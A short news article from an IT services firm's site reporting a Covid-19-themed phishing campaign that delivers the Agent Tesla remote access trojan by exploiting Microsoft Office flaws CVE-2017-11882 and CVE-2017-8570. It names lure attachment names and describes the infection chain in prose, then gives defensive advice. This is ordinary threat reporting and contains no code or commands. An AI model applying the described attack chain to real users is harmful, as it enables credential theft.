Covid-19 phishing Attack Spreads Agent Tesla Malware

Walden Systems Geeks Corner News Covid-19 phishing Attack Spreads Agent Tesla Malware Rutherford NJ New Jersey NYC New York City North Bergen County
CielView-Server minimizes redundancy in computing resources while allowing users remote desktop access to virtualized user Desktops. CielView-Desktop provides customized solutions to each user in an organization

Agent Tesla malware exploits two high impact vulnerabilities found in Microsoft Office in 2017. The latest Covid-19 phishing attack is smuggling in Agent Tesla. The remote access trojan (RAT) is smuggled inside attachments with double extension executables like ZIP and RAR.

Researchers outlined how three campaign variants deployed payloads to capture keystrokes, take screenshots, and dump browser passwords, then sent this data to an e-mail server. Stolen data could include financial credentials, screenshots, and email and social media credentials. This data can later be used for digital crimes, including financial crimes. Hackers can abuse stolen information like trade secrets, customer data, and client information for ransom or to sell trade secrets to a competitor.


Two of the three variants examined by researchers exploited a stack-based buffer overflow vulnerability present in the Microsoft Equation editor tool in unpatched versions of Microsoft Office 2016 and older (CVE-2017-11882).

Hidden inside attachments titled either COVID 19 NEW ORDER FACE MASKS.doc.rtf or COVID-19 Supplier Notice.zip, the payload performed code injection in the windows process RegAsm.exe and relayed stolen data back to the command and control server. Another variant analyzed is associated with RTF files called COVID-19 SUSPECTED AFFECTED VESSEL.doc or COVID-19 measures for FAIRCHEM STEED, Voyage (219152).doc which contains an OLE2Link object that exploits a remote code execution vulnerability, which affects Microsoft Office 2016 and older (CVE-2017-8570).

The winword.exe process then executed an embedded .sct file containing code that executed PowerShell.exe, which downloaded and executed a payload from a remote server. Agent Tesla, which was deployed in another recent phishing campaign, first emerged in 2014 and is written in Microsoft's .Net language. Hackerss can buy a subscription license from the official Agent Tesla website.

Users should avoid opening attachments & clicking on web links in unsolicited emails. Users could further mitigate risks with multi-factor authentication, employee awareness training, and keeping systems and software updated with latest patches applied.